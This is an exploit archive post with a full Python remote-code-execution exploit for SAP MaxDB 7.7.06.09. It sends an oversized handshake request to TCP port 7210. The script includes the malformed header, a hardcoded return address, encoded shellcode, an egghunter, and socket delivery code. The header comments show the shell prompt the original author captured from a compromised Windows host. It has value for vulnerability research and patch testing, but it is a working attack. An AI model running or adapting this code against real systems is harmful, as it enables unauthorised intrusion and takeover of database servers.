
SAP MaxDB Malformed Handshake Request Remote Code Execution

Posted on 26 March 2010

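#!/usr/bin/python
# Exploit title: SAP MaxDB Malformed Handshake Request Remote Code Execution
# Date: 2010.03.26
# Author: S2 Crew [Hungary]
# Software link: http://sap.com
# Version: 7.7.06.09
# Tested on: Windows XP SP2 EN
# Advisory: ZDI-10-032 (a ZDI advisory identifier, not a CVE number)
#
# Session captured by the original author after the overflow (the prompt is
# the MaxDB working directory):
#############################################################
# Trying 172.16.29.133...
# Connected to 172.16.29.133.
# Escape character is '^]'.
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\sdb\data\wrk>
#############################################################
#
# Proof of concept: a single oversized handshake request sent to the MaxDB
# listener (TCP 7210) overruns a buffer in the server.  The payload sits
# behind an egg tag deep in the filler and is located at run time by an
# egghunter, so only the 32-byte hunter has to land near the corrupted
# frame.  Only run this against a host you are authorised to test.
#
# Note on the listing: the archive copy had every backslash stripped
# ("x31xc9..."), which would have sent the literal ASCII characters rather
# than the intended bytes.  The escapes below are restored 1:1 from the
# hex digits that survived.

import socket
import sys

# Default target used by the original PoC; override on the command line.
TARGET_HOST = "172.16.29.133"
TARGET_PORT = 7210

# Encoded payload from the original PoC (369 bytes).  The first bytes are a
# GetPC stub (fnstenv [esp-0xc] / pop edi) followed by an xor-in-place loop,
# so this resembles a polymorphic self-decoding blob: its plaintext behaviour
# cannot be read off the listing.  Regenerate a payload you control before
# running this anywhere.
SHELLCODE = (
    b"\x31\xc9\xda\xda\xbe\x94\x3f\xbe\xea\xb1\x56\xd9\x74\x24\xf4"
    b"\x5f\x31\x77\x17\x03\x77\x17\x83\xef\xfc\x76\xca\x42\x02\xff"
    b"\x35\xbb\xd3\x9f\xbc\x5e\xe2\x8d\xdb\x2b\x57\x01\xaf\x7e\x54"
    b"\xea\xfd\x6a\xef\x9e\x29\x9c\x58\x14\x0c\x93\x59\x99\x90\x7f"
    b"\x99\xb8\x6c\x82\xce\x1a\x4c\x4d\x03\x5b\x89\xb0\xec\x09\x42"
    b"\xbe\x5f\xbd\xe7\x82\x63\xbc\x27\x89\xdc\xc6\x42\x4e\xa8\x7c"
    b"\x4c\x9f\x01\x0b\x06\x07\x29\x53\xb7\x36\xfe\x80\x8b\x71\x8b"
    b"\x72\x7f\x80\x5d\x4b\x80\xb2\xa1\x07\xbf\x7a\x2c\x56\x87\xbd"
    b"\xcf\x2d\xf3\xbd\x72\x35\xc0\xbc\xa8\xb0\xd5\x67\x3a\x62\x3e"
    b"\x99\xef\xf4\xb5\x95\x44\x73\x91\xb9\x5b\x50\xa9\xc6\xd0\x57"
    b"\x7e\x4f\xa2\x73\x5a\x0b\x70\x1a\xfb\xf1\xd7\x23\x1b\x5d\x87"
    b"\x81\x57\x4c\xdc\xb3\x35\x19\x11\x89\xc5\xd9\x3d\x9a\xb6\xeb"
    b"\xe2\x30\x51\x40\x6a\x9e\xa6\xa7\x41\x66\x38\x56\x6a\x96\x10"
    b"\x9d\x3e\xc6\x0a\x34\x3f\x8d\xca\xb9\xea\x01\x9b\x15\x45\xe1"
    b"\x4b\xd6\x35\x89\x81\xd9\x6a\xa9\xa9\x33\x1d\xee\x67\x67\x4d"
    b"\x98\x85\x97\x63\x04\x03\x71\xe9\xa4\x45\x29\x86\x06\xb2\xe2"
    b"\x31\x79\x90\x5e\xe9\xed\xac\x88\x2d\x12\x2d\x9f\x1d\xbf\x85"
    b"\x48\xd6\xd3\x11\x68\xe9\xfe\x31\xe3\xd1\x68\xcb\x9d\x90\x09"
    b"\xcc\xb7\x43\xaa\x5f\x5c\x94\xa5\x43\xcb\xc3\xe2\xb2\x02\x81"
    b"\x1e\xec\xbc\xb4\xe3\x68\x86\x7d\x3f\x49\x09\x7f\xb2\xf5\x2d"
    b"\x6f\x0a\xf5\x69\xdb\xc2\xa0\x27\xb5\xa4\x1a\x86\x6f\x7e\xf0"
    b"\x40\xf8\x07\x3a\x53\x7e\x08\x17\x25\x9e\xb8\xce\x70\xa0\x74"
    b"\x87\x74\xd9\x69\x37\x7a\x30\x2a\x47\x31\x19\x1a\xc0\x9c\xcb"
    b"\x1f\x8d\x1e\x26\x63\xa8\x9c\xc3\x1b\x4f\xbc\xa1\x1e\x0b\x7a"
    b"\x59\x52\x04\xef\x5d\xc1\x25\x3a\x57"
)

# 32-byte egghunter using the int 0x2e syscall probe: it advances through
# memory one page at a time (or dx,0xfff / inc edx), lets the kernel report
# whether the page is readable, and when it finds the tag "T00W" twice in a
# row it jumps to the bytes that follow (mov eax,"T00W" ... scasd/scasd ...
# jmp edi).
EGGHUNTER = (
    b"\x66\x81\xca\xff\x0f\x42\x52\x6a"
    b"\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
    b"\xef\xb8\x54\x30\x30\x57\x8b\xfa"
    b"\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
)

# Tag the hunter searches for; it must precede the shellcode twice.
EGG_TAG = b"T00W"

# Four bytes written at offset 50 of the request, labelled "HC" by the
# author.  Read little-endian this is 0x00a0f108; presumably the overwritten
# return address, but the listing does not say what it points at — verify
# against the target build before reuse.  Note it contains a NUL, which the
# handshake parser evidently tolerates.
RET = b"\x08\xf1\xa0\x00"


def build_packet(ret=RET, shellcode=SHELLCODE, egghunter=EGGHUNTER):
    """Return the malformed handshake request as ``bytes``.

    Layout (byte offsets):
      0-49    fixed handshake header copied from the original PoC; the
              0x63 at offsets 0 and 20 look like length fields of a
              99-byte legitimate request (TODO: confirm against the
              protocol) — the overflow comes from the body being ~10 KiB
      50-53   ``ret``
      54-65   twelve more fixed header bytes
      66-     5000 x 'A', the egg (tag twice + ``shellcode``),
              2500 x 'A', ``egghunter``, 2500 x NOP (0x90)

    The parameters exist so a caller can swap the return address or the
    payload without editing the module; the defaults reproduce the
    original PoC byte for byte.
    """
    header_before_ret = (
        b"\x63\x00\x00\x00\x03\x2f\x00\x00\x01\x00\x00\x00"
        b"\xff\xff\xff\xff\x00\x00\x04\x00\x63\x00\x00\x00"
        b"\x00\x02\x4b\x00\x04\x09\x00\x00\x44\x20\x00\x00"
        b"\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff"
        b"\x6d\x61"
    )
    header_after_ret = (
        b"\x00\x00\x00\x00\x00\x00"
        b"\x00\x00\x00\x00\x07\x49"
    )
    return b"".join([
        header_before_ret,
        ret,
        header_after_ret,
        b"A" * 5000,
        EGG_TAG * 2,
        shellcode,
        b"\x41" * 2500,
        egghunter,
        b"\x90" * 2500,
    ])


def send_exploit(host=TARGET_HOST, port=TARGET_PORT, timeout=10.0):
    """Connect to the MaxDB listener at ``host:port`` and deliver the request.

    Uses a connect/send timeout so an unreachable or wedged service does not
    hang the script, ``sendall`` because a single ``send`` may write only part
    of a ~10 KiB buffer, and always closes the socket.

    Raises whatever ``socket`` raises on connection or send failure.
    """
    packet = build_packet()
    sock = socket.create_connection((host, port), timeout)
    try:
        sock.sendall(packet)
    finally:
        sock.close()


if __name__ == "__main__":
    # Usage: maxdb_handshake.py [host] [port]
    target_host = sys.argv[1] if len(sys.argv) > 1 else TARGET_HOST
    target_port = int(sys.argv[2]) if len(sys.argv) > 2 else TARGET_PORT
    send_exploit(target_host, target_port)
# Inj3ct0r.com [2010-03-26]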

 
